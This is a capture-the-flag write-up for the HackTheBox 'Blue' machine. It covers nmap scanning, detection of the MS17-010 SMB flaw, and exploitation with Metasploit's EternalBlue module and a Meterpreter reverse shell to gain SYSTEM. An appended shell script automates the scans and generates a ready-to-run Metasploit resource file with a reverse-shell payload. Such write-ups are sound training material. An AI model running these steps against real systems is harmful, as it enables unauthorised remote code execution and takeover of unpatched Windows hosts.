Probably the easiest machine on HTB; the name itself hints at the kind of vulnerability it has. We start by running two types of nmap scan:
1. A scan with nmap's vulnerability scripts, to check for any known, already-scriptable vulnerability (a long shot, but cheap to run in the background):
2. A basic port scan that also reveals the services' versions:
The vulnerability scan takes a while to finish; in the meantime the normal port scan returns. Nothing is too out of the ordinary, but port 445 (SMB) being open reinforces our suspicion that this machine is vulnerable to the EternalBlue exploit:
A minute later the vulnerability scan results come back. As expected, the machine is vulnerable to an unauthenticated remote code execution flaw in SMBv1 that needs no user interaction: CVE-2017-0143, covered by Microsoft Security Bulletin MS17-010:
Security Bulletin info — https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
This vulnerability is well known, so there is almost certainly a Metasploit module for it; we launch msfconsole and search for “blue”:
We get multiple results; the one that catches the eye is number 17. We select it with “use” followed by the result number (the number is specific to this search output, so on another Metasploit version prefer the full module path):
The following options need to be set before running the exploit:
· PAYLOAD: a Meterpreter reverse TCP shell (meterpreter/reverse_tcp).
· RHOSTS: the target machine's IP address.
· LHOST: our own IP address on the HTB VPN interface (tun0), which is where the reverse shell connects back to.
The module's MS17-010 check runs first; it confirms that the machine is vulnerable before the exploit is fired:
A Meterpreter session opens. There is no need for privilege escalation: getuid shows that we are already running as SYSTEM:
All that is left is to find the two flags, which is easy since we are running at the highest privilege level:
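The scan-and-exploit sequence above, written out as an added example that is not part of the original write-up. It wraps the two nmap scans and a Metasploit resource file for the EternalBlue module in shell functions, and adds a small check that reads the smb-vuln-ms17-010 section of an nmap report, scoped to that script's block so that another vuln script's "State: VULNERABLE" line cannot produce a false positive. The addresses (10.10.10.40 for the target, 10.10.14.2 for the attacker's tun0) and the two sample reports are constructed for illustration; the nmap and msfconsole flags are the tools' real ones.

```shell
#!/bin/sh
# Added example (not from the original write-up). Target and VPN addresses
# below are assumptions; override them with TARGET=... LHOST=... ./blue.sh

TARGET="${TARGET:-10.10.10.40}"   # assumed HTB target address
LHOST="${LHOST:-10.10.14.2}"      # assumed attacker VPN (tun0) address

# Scan 1: nmap's NSE vulnerability scripts. Slow, so start it first, in the background.
nmap_vuln_scan() {
    nmap -sV --script vuln -oN "vuln_$1.nmap" "$1"
}

# Scan 2: default ports with service/version detection; finishes in about a minute.
nmap_version_scan() {
    nmap -sV -oN "ports_$1.nmap" "$1"
}

# Read an nmap report on stdin; return 0 only if the smb-vuln-ms17-010 block
# itself says "State: VULNERABLE". Other scripts in the same report print their
# own State lines, so the match is scoped to the block rather than grepping the file.
ms17_010_vulnerable() {
    awk '
        /^[|] smb-vuln-ms17-010:/      { inblock = 1; next }
        inblock && /^[|] [^ ]/         { inblock = 0 }   # a different script block starts
        inblock && /State: VULNERABLE/ { found = 1 }     # "NOT VULNERABLE" does not match
        inblock && /^[|]_/             { inblock = 0 }   # |_ is the last line of a block
        END { exit found ? 0 : 1 }
    '
}

# Write a Metasploit resource file mirroring the console steps from the text.
# Run it with: msfconsole -q -r eternalblue.rc ("check" runs the MS17-010 probe first).
write_msf_rc() {
    cat > "$1" <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOSTS $TARGET
set LHOST $LHOST
check
exploit
EOF
}

# Constructed sample reports (not real scan output) so the parser can be exercised offline.
SAMPLE_VULNERABLE=$(cat <<'EOF'
Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
EOF
)

# Here only ms08-067 is flagged; ms17-010 could not even negotiate a connection.
SAMPLE_PATCHED=$(cat <<'EOF'
Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|_    IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms17-010: Could not negotiate a connection: SMB: Failed to receive bytes: ERROR
EOF
)

# Illustrative use. Against a live target this would be:
#   nmap_vuln_scan "$TARGET" & nmap_version_scan "$TARGET"; wait
#   ms17_010_vulnerable < "vuln_$TARGET.nmap" && write_msf_rc eternalblue.rc
if printf '%s\n' "$SAMPLE_VULNERABLE" | ms17_010_vulnerable; then
    echo "sample 1: ms17-010 reported VULNERABLE, writing eternalblue.rc"
    write_msf_rc eternalblue.rc
fi
if ! printf '%s\n' "$SAMPLE_PATCHED" | ms17_010_vulnerable; then
    echo "sample 2: ms17-010 not reported (only ms08-067 flagged), EternalBlue is the wrong tool"
fi
```

The check function matters more than it looks: a plain `grep VULNERABLE` over a `--script vuln` report on an SMB host will often hit a different script's block, so the decision to fire EternalBlue should be tied to the ms17-010 block specifically.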